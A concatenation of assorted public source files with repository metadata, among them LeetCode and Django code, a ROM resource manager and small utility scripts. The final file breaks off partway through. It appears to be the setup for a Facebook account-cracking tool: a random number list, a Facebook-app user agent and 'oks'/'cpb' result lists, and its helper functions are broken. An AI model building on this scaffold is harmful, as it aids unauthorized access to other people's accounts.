1f6ecc9a87a9cf8415c9d78c3fb3778a97bf9c3f | 255e7b37e9ce28bbafba5a3bcb046de97589f21c | /leetcode_everyday/pastqing_491.py | d6d078bb2db9b5627bf0299def84a620217e9fd1 | [] | no_license | dog2humen/ForTheCoffee | 697d2dc8366921aa18da2fa3311390061bab4b6f | 2f940aa9dd6ce35588de18db08bf35a2d04a54f4 | refs/heads/master | 2023-04-15T09:53:54.711659 | 2021-04-28T13:49:13 | 2021-04-28T13:49:13 | 276,009,709 | 2 | 2 | null | 2020-07-01T08:29:33 | 2020-06-30T05:50:01 | Python | UTF-8 | Python | false | false | 849 | py | # coding:utf8
from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) -> List[List[int]]:
return self.findSubsequences_v1(nums)
def findSubsequences_v1(self, nums: List[int]) -> List[List[int]]:
res = []
self.helper(nums, 0, [], res)
return res
def helper(self, nums, start, cur, res):
if len(cur) > 1:
res.append(cur[:])
memo = set()
for i in range(start, len(nums)):
if nums[i] in memo:
continue
if len(cur) == 0 or cur[-1] <= nums[i]:
memo.add(nums[i])
self.helper(nums, i + 1, cur + [nums[i]], res)
if __name__ == '__main__':
obj = Solution()
nums = [4, 6, 7, 7]
#nums = [4, 3, 2, 1]
res = obj.findSubsequences(nums)
print(res)
| [
"116676671@qq.com"
] | 116676671@qq.com |
746804f360f1e40da68b13d2e7cfee548afc7669 | 69c470b8adbbc846b10f43c97390a5fbc11ab5d1 | /test.py | 8faf8eb42fbdce6cef33ed30462b5fab2972e737 | [] | no_license | kadikraman/RobotsOnMars | 9461108c4ba67d729f577fa09ed61d79e69e2994 | 243ed3a2d76d09300fa299df627e0326d71e3db6 | refs/heads/master | 2021-01-19T19:39:45.353847 | 2015-06-10T19:49:39 | 2015-06-10T19:49:39 | 37,213,250 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | import unittest
from game import Mars, Robot
class MarsTest(unittest.TestCase):
def test_constructor(self):
mars = Mars(3, 4)
self.assertEqual(mars.max_x, 3)
self.assertEqual(mars.max_y, 4)
self.assertEqual(mars.min_x, 0)
self.assertEqual(mars.min_y, 0)
self.assertEqual(mars.scented_tiles, [])
def test_is_location_on_map(self):
mars = Mars(1, 2)
self.assertTrue(mars.is_location_on_map(1, 2))
self.assertTrue(mars.is_location_on_map(0, 0))
self.assertFalse(mars.is_location_on_map(2, 2))
self.assertFalse(mars.is_location_on_map(-1, 2))
def test_add_scented_tile(self):
mars = Mars(2, 2)
mars.add_scented_tile(1, 2)
self.assertTrue([1, 2] in mars.scented_tiles)
def test_is_tile_scented(self):
mars = Mars(2, 3)
mars.add_scented_tile(1, 0)
self.assertTrue(mars.is_tile_scented(1, 0))
class RobotTest(unittest.TestCase):
def test_constructor(self):
robot = Robot(1, 2, 'W', 'FFFFL')
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
self.assertEqual(robot.current_direction, 'W')
self.assertEqual(robot.instructions, 'FFFFL')
self.assertFalse(robot.has_been_lost)
def test_move_forward(self):
robot = Robot(1, 2, 'N', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 3)
robot = Robot(1, 2, 'S', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 1)
robot = Robot(1, 2, 'E', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 2)
self.assertEqual(robot.current_y, 2)
robot = Robot(1, 2, 'W', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 0)
self.assertEqual(robot.current_y, 2)
def test_move_backward(self):
robot = Robot(1, 3, 'N', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(1, 1, 'S', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(2, 2, 'E', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(0, 2, 'W', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
def test_turn_left(self):
robot = Robot(1, 2, 'N', 'EFFF')
self.assertEqual(robot.turn('L'), 'W')
robot = Robot(1, 2, 'S', 'EFFF')
self.assertEqual(robot.turn('L'), 'E')
robot = Robot(1, 2, 'E', 'EFFF')
self.assertEqual(robot.turn('L'), 'N')
robot = Robot(1, 2, 'W', 'EFFF')
self.assertEqual(robot.turn('L'), 'S')
| [
"hellokadi@gmail.com"
] | hellokadi@gmail.com |
02c76a2e79fb0f9363e861f6d4bd62d7980bfd78 | fa869e034021609dd04bda44b4118909efc53b82 | /app/YtManagerApp/migrations/0001_initial.py | c294b27924a459dd06023245a0132cb88b5ea180 | [
"MIT"
] | permissive | J-tt/ytsm | 14bbb8ea4f1e39c99f8d01966e709e0b6c6c169d | f4a4f52f6cde6e9e931e2515c040e612c58cb031 | refs/heads/master | 2020-04-03T14:21:43.717656 | 2018-11-02T03:35:55 | 2018-11-02T03:35:55 | 155,319,047 | 1 | 0 | MIT | 2018-11-02T03:35:56 | 2018-10-30T03:29:11 | HTML | UTF-8 | Python | false | false | 5,067 | py | # Generated by Django 2.1.2 on 2018-10-11 00:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Channel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('channel_id', models.TextField(unique=True)),
('username', models.TextField(null=True, unique=True)),
('custom_url', models.TextField(null=True, unique=True)),
('name', models.TextField()),
('description', models.TextField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('upload_playlist_id', models.TextField()),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('playlist_id', models.TextField(unique=True)),
('description', models.TextField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('auto_download', models.BooleanField(null=True)),
('download_limit', models.IntegerField(null=True)),
('download_order', models.TextField(null=True)),
('manager_delete_after_watched', models.BooleanField(null=True)),
('channel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.Channel')),
],
),
migrations.CreateModel(
name='SubscriptionFolder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.SubscriptionFolder')),
],
),
migrations.CreateModel(
name='UserSettings',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mark_deleted_as_watched', models.BooleanField(null=True)),
('delete_watched', models.BooleanField(null=True)),
('auto_download', models.BooleanField(null=True)),
('download_global_limit', models.IntegerField(null=True)),
('download_subscription_limit', models.IntegerField(null=True)),
('download_order', models.TextField(null=True)),
('download_path', models.TextField(null=True)),
('download_file_pattern', models.TextField(null=True)),
('download_format', models.TextField(null=True)),
('download_subtitles', models.BooleanField(null=True)),
('download_autogenerated_subtitles', models.BooleanField(null=True)),
('download_subtitles_all', models.BooleanField(null=True)),
('download_subtitles_langs', models.TextField(null=True)),
('download_subtitles_format', models.TextField(null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('video_id', models.TextField()),
('name', models.TextField()),
('description', models.TextField()),
('watched', models.BooleanField(default=False)),
('downloaded_path', models.TextField(blank=True, null=True)),
('playlist_index', models.IntegerField()),
('publish_date', models.DateTimeField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('subscription', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.Subscription')),
],
),
migrations.AddField(
model_name='subscription',
name='parent_folder',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='YtManagerApp.SubscriptionFolder'),
),
migrations.AddField(
model_name='subscription',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"chibicitiberiu@gmail.com"
] | chibicitiberiu@gmail.com |
85c8a05dbc3ccd700e56696411f9f0987cab48a8 | 8e8ea9e41032398fa8b1c54d73475a54aa11d293 | /page/quarter/quarter_statistic/quarter_statistic.py | 3df8bda70c25e22d603ec3c1cedd4f084dcf02b2 | [] | no_license | xmaimiao/wmPC_quarter | 6b69812b42039101d89076923c329d8e5952308b | 255666ccb5d2cac38b6975c0ae1ab055caabe41f | refs/heads/master | 2023-03-28T02:41:21.347163 | 2021-03-29T07:12:44 | 2021-03-29T07:12:44 | 352,538,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | from common.contants import quarter_statistic_dir
from page.base.basepage import BasePage
from page.quarter.quarter_statistic.quarter_statistic_detail import Quarter_Statistic_Detail
class Quarter_Statistic(BasePage):
def wait_sleep(self,sleeps):
self.sleep(sleeps)
return self
def simple_search(self,keys):
'''
簡易查詢,傳進來一個字典{quarter_type:"全部",keywords:xxxx}
'''
self._params["quarter_name"] = keys["quarter_name"]
self.step(quarter_statistic_dir,"search_input")
return self
def advanced_search(self,keys):
'''
高级查詢,傳進來一個字典
{startTime:{switch:False,value:2020/01/05},endStartTime:{switch:False,value:2020/01/05},
startPlanExpireTime:{switch:False,value:2020/01/05},endPlanExpireTime:{switch:False,value:2020/01/05},
startFinishedNumber:{switch:False,value:0},endFinishedNumber:{switch:False,value:0},
startPushNumber:{switch:False,value:0},endPushNumber:{switch:False,value:0},
frequency:{switch:False,value:每天},
peopleOriented:{switch:False,value:限定人群},
status:{switch:False,value:進行中},
'''
self.step(quarter_statistic_dir, "click_advanced_search")
# if keys["startTime"]["switch"] == True:
# self._params["startTime"] = keys["startTime"]["value"]
# self.step(quarter_statistic_dir,"startTime")
# if keys["endStartTime"]["switch"] == True:
# self._params["endStartTime"] = keys["endStartTime"]["value"]
# self.step(quarter_statistic_dir,"endStartTime")
# if keys["startPlanExpireTime"]["switch"] == True:
# self._params["startPlanExpireTime"] = keys["startPlanExpireTime"]["value"]
# self.step(quarter_statistic_dir,"startPlanExpireTime")
# if keys["endPlanExpireTime"]["switch"] == True:
# self._params["endPlanExpireTime"] = keys["endPlanExpireTime"]["value"]
# self.step(quarter_statistic_dir,"endPlanExpireTime")
# 回收數量-前置
if keys["startFinishedNumber"]["switch"] == True:
self._params["startFinishedNumber"] = keys["startFinishedNumber"]["value"]
self.step(quarter_statistic_dir,"startFinishedNumber")
# 回收數量-後置
if keys["endFinishedNumber"]["switch"] == True:
self._params["endFinishedNumber"] = keys["endFinishedNumber"]["value"]
self.step(quarter_statistic_dir,"endFinishedNumber")
# if keys["startPushNumber"]["switch"] == True:
# self._params["startPushNumber"] = keys["startPushNumber"]["value"]
# self.step(quarter_statistic_dir,"startPushNumber")
# if keys["endPushNumber"]["switch"] == True:
# self._params["endPushNumber"] = keys["endPushNumber"]["value"]
# self.step(quarter_statistic_dir,"endPushNumber")
# 查詢問卷名稱
if keys["title"]["switch"] == True:
self._params["title"] = keys["title"]["value"]
self.step(quarter_statistic_dir,"title")
# # 查詢推送週期
# if keys["frequency"]["switch"] == True:
# self._params["frequency"] = keys["frequency"]["value"]
# self.step(quarter_statistic_dir, "frequency")
# # 查詢問卷類型
# if keys["peopleOriented"]["switch"] == True:
# self._params["frequency"] = keys["peopleOriented"]["value"]
# self.step(quarter_statistic_dir, "peopleOriented")
# 查询問卷状态
if keys["status"]["switch"] == True:
self._params["status"] = keys["status"]["value"]
self.step(quarter_statistic_dir, "status")
self.step(quarter_statistic_dir,"click_search")
return self
def view_the_fir(self,quarter_name):
'''
點擊第一行數據“查看”按鈕
'''
self._params["quarter_name"] = quarter_name
self.step(quarter_statistic_dir,"view_the_fir")
return Quarter_Statistic_Detail(self._driver)
def get_quarter_name_the_fir(self):
'''
編輯第一行問卷的名稱
'''
try:
return self.step(quarter_statistic_dir,"get_quarter_name_the_fir")
except Exception as e:
print("暫無數據!")
raise e
def get_quarter_status_the_fir(self):
'''
編輯第一行問卷的狀態
'''
try:
return self.step(quarter_statistic_dir,"get_quarter_status_the_fir")
except Exception as e:
print("暫無數據!")
raise e | [
"765120214@qq.com"
] | 765120214@qq.com |
cdf4b52ed6332f8f54fd6b2ebceb4ed51ac48bed | 547c2560e1ed1e0f822f7d9566d4cc9b772ab121 | /analyzing/result_analizer.py | 829fa801adea88fae6eb5b89c4f04d4b1c5ec7b8 | [] | no_license | NullSeile/pipeleak-prediction | a2cf1e441988ff643c9e25afc64ae08cf20ff2a0 | a86f6df041fc0c0dce5ebce92d0bf83294c01cfd | refs/heads/master | 2022-12-03T20:42:00.649304 | 2020-08-19T10:57:50 | 2020-08-19T10:57:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 603 | py | import psycopg2
import matplotlib.pyplot as plt
import seaborn as sns
import json
# Connect to the database
conn = psycopg2.connect(database='giswater3', user='postgres', password='postgres', host='localhost')
cursor = conn.cursor()
cursor.execute(f"SELECT log_message FROM api_ws_sample.audit_log_data where fprocesscat_id=48")
data = cursor.fetchall()
data = [json.loads(d[0])['value'] for d in data]
plt.figure(figsize=(9, 5), dpi=100)
sns.distplot(data, kde=False)
plt.ylabel("nombre de canonades", size=15)
plt.xlabel("predicció de la xarxa neuronal", size=15)
plt.tight_layout()
plt.show() | [
"eliesbertran@gmail.com"
] | eliesbertran@gmail.com |
68178180130d101c355eadc65d3bf4a483057241 | 322ee109855ecc20d44f11c9ad86a148a6f759ff | /wc.py | bf2be9f3395ffce137d603bdf2a04f6cc429da0a | [] | no_license | rvenkates/HelloWorld | ce6fe0f4866a9144982622e71c45c031668873c2 | d392c1da0ffa1f7fd024a4b8ae523467084f2c56 | refs/heads/master | 2021-01-17T17:45:56.579453 | 2016-06-23T04:02:16 | 2016-06-23T04:02:16 | 61,771,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | # wc.py
import sys
# wc -l <file...>
# number of lines in the file(s)
# wc -w <file...>
# number of words in the file(s)
# wc -b <file...>
# number of characters in the file(s)
# wc -nbl <files...>
# number of non-blank-lines in the file
def count_lines(text):
return len(text.splitlines())
def count_words(text):
return len(text.split())
def count_characters(text):
return len(text)
def count_non_blank_lines(text):
lines = text.splitlines()
non_blank_lines = [line for line in lines if line.strip()]
return len(non_blank_lines)
modes = {'-l': count_lines,
'-w': count_words,
'-b': count_characters,
'-nbl': count_non_blank_lines}
if __name__ == '__main__':
mode = sys.argv[1] if len(sys.argv) >= 3 else '-l'
filenames = sys.argv[2:] if len(sys.argv) >= 3 else [__file__]
func = modes[mode]
total = 0
for filename in filenames:
with open(filename) as f:
text = f.read()
count = func(text)
total += count
print filename, count
| [
"ravenkat@gmail.com"
] | ravenkat@gmail.com |
4d12edf6f5c312dcdaf63d96d3601f13f20c4e8e | 475cc5a390984d135e638f0743581892734f3ae9 | /criterio2.py | 1df9cb6e0e7a31141fb49088c293e560aeaa3666 | [] | no_license | nataly0914/Priorizacion_proyectos | bfd9d39aa78ee207aaa12d30fafbcdc1e2c90b5e | 881b7d30a5adabff35247d7d5266dfaff9a4ff18 | refs/heads/master | 2022-12-17T17:43:57.420441 | 2020-09-22T01:43:25 | 2020-09-22T01:43:25 | 297,502,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | import numpy as np
import csv
import pandas as pd
m = pd.read_excel('ahp(criterio2).xlsx') #matriz de comparaciones
result1 = m**2
#print(result1)
result2 = result1.sum(1) #suma filas
#print(result2)
result3 = result2.sum(0) #suma columnas
#print(result3)
result4c = result2*(1/result3)
print(result4c)
V2 = np.matrix(result4c).reshape(20, 1)
print('Valores propios', V2) #valores propios V
#CÁLCULO CONSISTENCIA LÓGICA
matrixB = m.sum(0) #suma de cada columna
B = np.matrix(matrixB).reshape(1, 20)
print('matriz B', B) #MATRIZ B
n = np.shape(B)[1] #dimensión (n)
maxVP = B*V2 #valor propio máximo
print("El máximo valor propio es:", maxVP)
indexC = (maxVP - n) / (n-1)
print('CI es', indexC)
indexA = (1.98 * (n-2))/n
print('IA es', indexA)
relationC = indexC / indexA
print(relationC)
if relationC <0.1:
print("Relación de consistencia adecuada")
else:
print("Es necesario reevaluar los juicios. Se debe consultar nuevamente a los expertos")
| [
"noreply@github.com"
] | noreply@github.com |
046c6d40b95bd73eb9c4ce844bf9e4a88bb0a451 | a5873ffbf8507bc42837cbedcfde1ea5d25f455b | /palindrome/is.py | d6d546a77c55b49bd8d665999034ea66d568536d | [] | no_license | jhnlsn/algo | 4bc62d2a81b045aee307cb4924c1678ad8170203 | 6d3d89cc1c59749cb6b00602fd4f7c778ccd0d47 | refs/heads/master | 2021-01-20T22:47:28.196546 | 2018-09-17T22:14:58 | 2018-09-17T22:14:58 | 101,826,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | def isPalindrome(S):
length=len(S)
if length < 2:
return True
elif S[0] != S[-1]:
return False
else:
return isPalindrome(S[1:length - 1])
# Yes
print isPalindrome("abnnba")
# No
print isPalindrome("what") | [
"jnelson11@gmail.com"
] | jnelson11@gmail.com |
ccfb2dcfad65cf7dddb9647376539a3e4cdefae4 | 51c38290efbc4e0ec4cffde9307d0da861d6fb14 | /projects/get_bitcoin_paprika.py | 1331c2f7c9c99a8a8dad6c22a944963ca828ceba | [] | no_license | octopusengine/octopuslab | 485c9babd0a333bacd94e12be82b0febb00482ce | 6941424ade1e5c2563290fb32cf39034a55968f6 | refs/heads/master | 2023-08-03T20:58:31.744462 | 2023-07-15T13:33:37 | 2023-07-15T13:33:37 | 123,679,465 | 32 | 22 | null | 2022-11-03T10:17:11 | 2018-03-03T09:52:52 | JavaScript | UTF-8 | Python | false | false | 479 | py | # get bitcoin
from time import sleep
import urequests, json
from utils.octopus import w
from shell.terminal import printTitle
w()
def bitcoin_usd():
res = urequests.get("https://api.coinpaprika.com/v1/tickers/btc-bitcoin")
btcusd = res.json()['quotes']["USD"]["price"]
return float(btcusd)
printTitle("get_bitcoin.py")
print("this is simple Micropython example | ESP32 & octopusLAB")
print()
while True:
btc = bitcoin_usd()
print(btc)
sleep(10)
| [
"honza.copak@gmail.com"
] | honza.copak@gmail.com |
ee457f289841191e83c633c08fc0988a43b1383d | 1cd732ab0060a8872830e59bb6e4f7a85af100a1 | /gbahack/resource.py | b806d2b00df82e99021820d4f0a77f97085ddb3f | [] | no_license | trevor403/GBA-Pokemon-Hacking | cfdfd82824fed52730a8c62fd8c1b53eca121e53 | b0d339cbfa763b3e5f44b480c764c85be07a2c4d | refs/heads/master | 2020-05-29T11:54:59.590692 | 2014-02-18T12:00:44 | 2014-02-18T12:00:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,787 | py |
class PointerObserver():
'''
Interface for classes that want to observe pointer changes.
By calling register(), the object is registered for pointer changes updates,
after such a change, the pointerChanged callback is called.
'''
def register(self, rm):
'''
Registers itself to the resource manager that the class
want to get notifications of pointer changes.
'''
rm.register(self)
def pointerChanged(self, rm, oldpointer, newpointer):
'''Callback from resource manger rm: a pointer has changed.'''
raise NotImplementedError()
def pointerRemoved(self, rm, pointer):
'''A pointer was removed from the ROM, and becomes an invalid resource.'''
raise NotImplementedError()
class ResourceManager():
'''Manager of ROM resources.'''
def __init__(self, rom):
self.rom = rom
self.pointerwatchers = []
#Keep resources in a list of resources, and a list of pointers
self.resources = {} #key: resource, value: pointer (None=no pointer)
self.pointers = {} #key: pointer, value: resource (note: contians only ROM-stored resources)
def register(self, pointerobserver):
'''
Register an PointerObserver object for pointer change callbacks.
Registee should be of type PointerObserver.
'''
self.pointerwatchers.append(pointerobserver)
def get(self, resourceclass, pointer):
'''
Returns an initialized resource, read from the rom.
Resourceclass is the resource class that should be read.
Pointer is the location in the ROM where the pointer is stored.
'''
if not pointer in self.pointers:
r = resourceclass.read(self.rom, pointer)
self.pointers[pointer] = r
self.resources[r] = pointer
elif not isinstance(self.pointers[pointer], resourceclass):
raise Exception("Pointer already loaded, but of different resource type.")
return self.pointers[pointer]
def store(self, resource, allow_replacement=True):
'''
Stores a resource in the ROM.
If the resource was not already stored, the resource is written into a
new location in the ROM.
If the resource was already stored the resource will be updated.
If allow_replacement is False, the resource is *always* written at the
old pointer location, possibly overwriting other data.
If a pointer location changes, all pointerwachters are informed.
Returns the new pointer location.
'''
oldpointer = None
if resource not in self.resources:
newpointer = resource.write(self.rom, 0x08000000) #TODO: Hardcoded :(
else:
oldpointer = self.resources[resource]
newpointer = resource.update(self.rom, oldpointer, allow_replacement)
del self.pointers[oldpointer]
self.pointers[newpointer] = resource
self.resources[resource] = newpointer
#Inform others only after the resoure manager indices are up to date.
if oldpointer and oldpointer != newpointer:
print("! Pointer 0x%X has been changed 0x%X"%(oldpointer, newpointer))
for watcher in self.pointerwachters:
watcher.pointerChanged(self, oldpointer, newpointer)
return newpointer
def delete(self, resource):
'''Removes a resource from the ROM and informs pointerwachters.'''
if resource not in self.resources:
return
pointer = self.resources[resource]
del self.resources[resource]
del self.pointers[pointer]
resource.delete(self.rom, pointer)
print("! Pointer 0x%X is removed from the ROM."%pointer)
for watcher in self.pointerwatchers:
watcher.pointerRemoved(self, pointer)
class Resource():
'''
Abstract class that represents a resource in a given ROM.
By implementing the read, and bytestringmethods, the developper gets
write, update and delete method for free.
This class does not deal with resources that depend of other resources,
for that, these dependencies should be added to implementations of
subclasses.
'''
name = "resource"
@classmethod
def read(cls, rom, pointer):
'''
Loads the resource from a rom, starting at a given pointer.
Returns a new initialized Resource object.
'''
raise NotImplementedError()
def bytestring(self):
'''
Returns the bytestring representation of the resource.
This is how the resource should be written to the ROM (i.e. the compiled
resource object). Returns an array.array('B') object.
'''
raise NotImplementedError()
### End of unimplemented methods ##
@classmethod
def delete(self, rom, pointer):
'''
Removes a resource of the implemented resource type from the ROM,
frees the memory in the rom and returns the removed object.
'''
old = self.read(rom, pointer)
rom.trunc(pointer, old.blength())
return old
def blength(self):
'''
Returns the length of the resource in bytes.
'''
return len(self.bytestring())
def write(self, rom, pointer=None, force=False):
'''
Writes the given resource to the rom, at the given pointer.
If there is not enough free space left at the given pointer:
1) and force==False, then the object is written at some free space.
2) and force==True, the objects is written anyway, possibly
overwriting other excisting data. Pointer should contain a valid
value.
If a resource has to be overwritten, it should be removed first.
Returns the pointer the resource was written to.
Note that this pointer does not have to match the requested pointer.
'''
#Assertions checking first
if force == True and not pointer:
raise Exception("Write to ROM: force is true, but no pointer was given.")
writebytes = self.bytestring()
blength = len(writebytes)
#Determine where to write the data to
writepointer = pointer
if not force == True:
writepointer = rom.findSpace(pointer or 0, blength)
rom.writeArray(writepointer, writebytes)
return writepointer
def update(self, rom, offset, force=False, writeoffset=None):
'''
Updates the given resource in the rom. If the new resource is larger
than the old one, the old data is removed, and the object is written
at another location in the ROM. If the resource is smaller than the old
one, the unused bytes are freed.
The offset parameter should point to the start of the old offset.
The force parameter set to true ensures that the resource is written at the exact location, no matter what.
The writeoffset is an optional parameter, if the resource does not fit, a new location is looked up for after this offset.
'''
old = self.delete(rom, offset)
if rom.findSpace(offset, self.blength()) == offset or force:
return self.write(rom, offset, force)
else:
#Need to move the resource
return self.write(rom, writeoffset, force)
| [
"theunknowncylon@live.nl"
] | theunknowncylon@live.nl |
921f2814602574d17fbd234becf4865925f0b64f | 488e0934b8cd97e202ae05368c855a57b299bfd1 | /Django/advanced/test_Blog/test_bookblog/book_app/migrations/0004_auto_20190408_1955.py | b4880c98ea624c5db12cdd69a946c614d2cc847a | [] | no_license | didemertens/udemy_webdev | 4d96a5e7abeec1848ecedb97f0c440cd50eb27ac | 306215571be8e4dcb939e79b18ff6b302b75c952 | refs/heads/master | 2020-04-25T00:24:45.654136 | 2019-04-13T16:00:47 | 2019-04-13T16:00:47 | 172,377,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # Generated by Django 2.1.7 on 2019-04-08 19:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('book_app', '0003_blog_intro'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='intro',
field=models.TextField(),
),
]
| [
"d.g.j.mertens@gmail.com"
] | d.g.j.mertens@gmail.com |
d8879d70d7907d646a13effb15a75c6c4795902f | 3d6f48ff3d50eded2f1492f13bd1495311910c47 | /quiz/urls.py | 11b4a2f648804ad3764d4dda50fd1544ddca3b52 | [] | no_license | deepak9039/DK180_the_Hater-S_SIH2020 | b47ec2bb68a98cb1169665b5effbc79e7a72762e | ff14cd446bd732ec0b1a1e4b5fd67b697d9f659a | refs/heads/master | 2023-08-18T23:59:51.617725 | 2021-01-13T05:04:37 | 2021-01-13T05:04:37 | 284,043,080 | 0 | 0 | null | 2021-09-22T19:31:59 | 2020-07-31T13:28:42 | HTML | UTF-8 | Python | false | false | 630 | py | from django.urls import path, re_path
# from views import MyQuizListAPI, QuizListAPI, QuizDetailAPI, SaveUsersAnswer, SubmitQuizAPI
from . import views
urlpatterns = [
path("", views.MyQuizList.as_view(),name="myQuizList"),
path("quize/<slug>/", views.QuizDetail.as_view(),name="quizDetail"),
path("save-answer/", views.saveUserAnswer,name= "saveUserAnswer"),
path("result/<slug>/", views.show_result,name="result"),
path("instruction/", views.instruction,name= "instruction"),
# re_path(r"quizzes/(?P<slug>[\w\-]+)/$", QuizDetailAPI.as_view()),
# re_path(r"quizzes/(?P<slug>[\w\-]+)/submit/$", SubmitQuizAPI.as_view()),
] | [
"61735881+deepak9039@users.noreply.github.com"
] | 61735881+deepak9039@users.noreply.github.com |
9acc09596a0d2f48d39eb393cb68b008d68b6ff7 | 852c3151239d45267a5961fc0a2e94fa34dd741a | /Heart1.py | bd5458a3133bbea3be47442bea8c4aec5c3d6170 | [] | no_license | NudePagla/Nudebaba | 23bd3d984a2c966f94339a1c6ddd08859f7c16fa | c44746c830bf678d2afe7912dffd0f2c74c931f8 | refs/heads/main | 2023-02-28T22:17:31.914097 | 2021-02-13T10:35:58 | 2021-02-13T10:35:58 | 338,548,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,587 | py | # Ustad# SIDRA5# Thuglife# Usman Star# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(99999):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;92m╔╗─╔╗╔═══╗╔═╗╔═╗╔═══╗╔═╗─╔╗
\033[1;93m║║─║║║╔═╗║║║╚╝║║║╔═╗║║║╚╗║║
\033[1;94m║║─║║║╚══╗║╔╗╔╗║║║─║║║╔╗╚╝║
\033[1;95m║║─║║╚══╗║║║║║║║║╚═╝║║║╚╗║║
\033[1;96m║╚═╝║║╚═╝║║║║║║║║╔═╗║║║─║║║
\033[1;97m╚═══╝╚═══╝╚╝╚╝╚╝╚╝─╚╝╚╝─╚═╝
\033[1;98m╔══╗╔══╗╔══╗╔═╗
\033[1;99m║══╣╚╗╔╝║╔╗║║╬║
\033[1;94m╠══║─║║─║╠╣║║╗╣
\033[1;96m╚══╝─╚╝─╚╝╚╝╚╩╝
\033[1;98m╔══╗─╔═══╗╔╗──╔╗
\033[1;96m║╔╗║─║╔═╗║║╚╗╔╝║
\033[1;92m║╚╝╚╗║║─║║╚╗╚╝╔╝
\033[1;94m║╔═╗║║║─║║─╚╗╔╝─
